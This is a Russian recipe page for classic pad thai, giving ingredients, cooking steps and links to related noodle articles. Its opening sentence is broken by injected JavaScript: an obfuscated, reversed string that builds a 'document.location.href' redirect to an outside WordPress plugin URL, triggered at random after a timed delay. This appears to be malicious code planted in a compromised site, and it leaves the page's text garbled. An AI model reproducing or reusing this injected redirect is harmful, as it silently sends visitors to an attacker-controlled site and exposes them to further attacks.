Редакция fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru и международная Группа компаний Mareven с брендом «Роллтон» продолжают делиться рецептами простых и вкусных блюд с лапшой. Пад тай — классическое тайское блюдо, которое легко приготовить дома.
420 calories
Классический пад тай
Традиционное блюдо тайской кухни с обжаренной вермишелью, овощами и пряным соусом.
Классический пад тай
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
20 минут
КОЛИЧЕСТВО ПОРЦИЙ:
2 порции
КАЛОРИЙНОСТЬ:
420 ккал
Сложность
Время
20 минут
Кол-во порций
2 порции
Калорийность
420 ккал
Ингредиенты
Лапша
200 г
Оливковое масло
2 ст. л.
Курица (филе грудки)
200 г
Бобы (проростки)
1/2 стакана
Морковь (натёртая)
1/3 стакана
Чеснок
2 зубчика
Яйца
2 шт.
Сахар
1/3 стакана
Соус (рыбный)
1/4 стакана
Специи (тамаринд)
1/4 стакана
Соус (соевый)
2 ст. л.
Лайм
1 шт.
Процесс приготовления
- Для соуса смешайте сахар, рыбный и соевый соусы, тамаринд и сок лайма.
- Приготовьте лапшу по инструкции на упаковке.
- Куриную грудку отварите до готовности.
- В сковороде разогрейте масло, добавьте морковь и измельчённый чеснок. Влейте взбитые яйца и обжаривайте до готовности яиц.
- Добавьте в сковороду лапшу, соус, кусочки курицы. Перемешайте и подержите на огне пару минут.
- Подавайте пад тай горячим с проростками бобов.
Больше рецептов!
Статьи по теме
Рецепт дня: боул с лапшой, тофу и овощами
Самый полный гид по лапше: что нужно знать и что из неё приготовить
Рецепт дня: лапша с арахисовым соусом и сыром халуми
9 сытных осенних блюд: что приготовить на обед или ужин